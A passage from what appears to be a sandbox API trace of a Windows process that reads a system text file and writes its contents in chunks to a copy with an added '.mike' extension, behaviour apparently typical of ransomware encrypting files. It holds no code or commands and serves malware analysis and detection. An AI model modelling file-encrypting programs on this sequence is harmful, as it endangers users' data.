NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.831] GetFileType (hFile=0x284) returned 0x1 [0129.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.831] GetFileType (hFile=0x284) returned 0x1 [0129.831] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xd9a20 [0129.831] WriteFile (in: hFile=0x284, lpBuffer=0x212e1a4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x212e1a4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.832] CloseHandle (hObject=0x284) returned 1 [0129.832] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.832] GetFileType (hFile=0x284) returned 0x1 [0129.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.832] GetFileType (hFile=0x284) returned 0x1 [0129.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.833] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.833] GetFileType (hFile=0x284) returned 0x1 [0129.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.833] GetFileType (hFile=0x284) returned 0x1 [0129.833] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xdc220 [0129.833] WriteFile (in: hFile=0x284, lpBuffer=0x213b214*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x213b214*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.834] CloseHandle (hObject=0x284) returned 1 [0129.834] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.834] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.834] GetFileType (hFile=0x284) returned 0x1 [0129.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.834] GetFileType (hFile=0x284) returned 0x1 [0129.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.835] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.835] GetFileType (hFile=0x284) returned 0x1 [0129.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.835] GetFileType (hFile=0x284) returned 0x1 [0129.835] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xdea20 [0129.835] WriteFile (in: hFile=0x284, lpBuffer=0x2148284*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2148284*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.836] CloseHandle (hObject=0x284) returned 1 [0129.836] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.836] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.836] GetFileType (hFile=0x284) returned 0x1 [0129.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.836] GetFileType (hFile=0x284) returned 0x1 [0129.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.840] GetFileType (hFile=0x284) returned 0x1 [0129.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.840] GetFileType (hFile=0x284) returned 0x1 [0129.840] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xe1220 [0129.840] WriteFile (in: hFile=0x284, lpBuffer=0x21552f4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21552f4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.840] CloseHandle (hObject=0x284) returned 1 [0129.840] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.840] GetFileType (hFile=0x284) returned 0x1 [0129.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.841] GetFileType (hFile=0x284) returned 0x1 [0129.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.842] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.842] GetFileType (hFile=0x284) returned 0x1 [0129.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.842] GetFileType (hFile=0x284) returned 0x1 [0129.842] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xe3a20 [0129.842] WriteFile (in: hFile=0x284, lpBuffer=0x2162364*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2162364*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.842] CloseHandle (hObject=0x284) returned 1 [0129.842] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.843] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.843] GetFileType (hFile=0x284) returned 0x1 [0129.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.843] GetFileType (hFile=0x284) returned 0x1 [0129.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.844] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.844] GetFileType (hFile=0x284) returned 0x1 [0129.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.844] GetFileType (hFile=0x284) returned 0x1 [0129.844] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xe6220 [0129.844] WriteFile (in: hFile=0x284, lpBuffer=0x216f3d4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x216f3d4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.844] CloseHandle (hObject=0x284) returned 1 [0129.844] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.844] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.845] GetFileType (hFile=0x284) returned 0x1 [0129.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.845] GetFileType (hFile=0x284) returned 0x1 [0129.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.846] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.846] GetFileType (hFile=0x284) returned 0x1 [0129.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.846] GetFileType (hFile=0x284) returned 0x1 [0129.846] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xe8a20 [0129.846] WriteFile (in: hFile=0x284, lpBuffer=0x217c444*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x217c444*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.846] CloseHandle (hObject=0x284) returned 1 [0129.846] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.846] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.847] GetFileType (hFile=0x284) returned 0x1 [0129.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.847] GetFileType (hFile=0x284) returned 0x1 [0129.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.848] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.848] GetFileType (hFile=0x284) returned 0x1 [0129.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.848] GetFileType (hFile=0x284) returned 0x1 [0129.848] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xeb220 [0129.848] WriteFile (in: hFile=0x284, lpBuffer=0x21894b4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21894b4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.848] CloseHandle (hObject=0x284) returned 1 [0129.848] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.848] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.848] GetFileType (hFile=0x284) returned 0x1 [0129.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.849] GetFileType (hFile=0x284) returned 0x1 [0129.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.849] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.850] GetFileType (hFile=0x284) returned 0x1 [0129.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.850] GetFileType (hFile=0x284) returned 0x1 [0129.850] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xeda20 [0129.850] WriteFile (in: hFile=0x284, lpBuffer=0x2196524*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2196524*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.850] CloseHandle (hObject=0x284) returned 1 [0129.850] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.850] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.850] GetFileType (hFile=0x284) returned 0x1 [0129.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.956] SleepEx (dwMilliseconds=0x2, bAlertable=0) returned 0x0 [0129.994] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0129.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.995] SetFilePointer (in: hFile=0x284, lDistanceToMove=1136640, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x115800 [0130.004] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.005] SetFilePointer (in: hFile=0x284, lDistanceToMove=1146880, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x118000 [0130.006] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.008] SetFilePointer (in: hFile=0x284, lDistanceToMove=1157120, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x11a800 [0130.009] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.009] 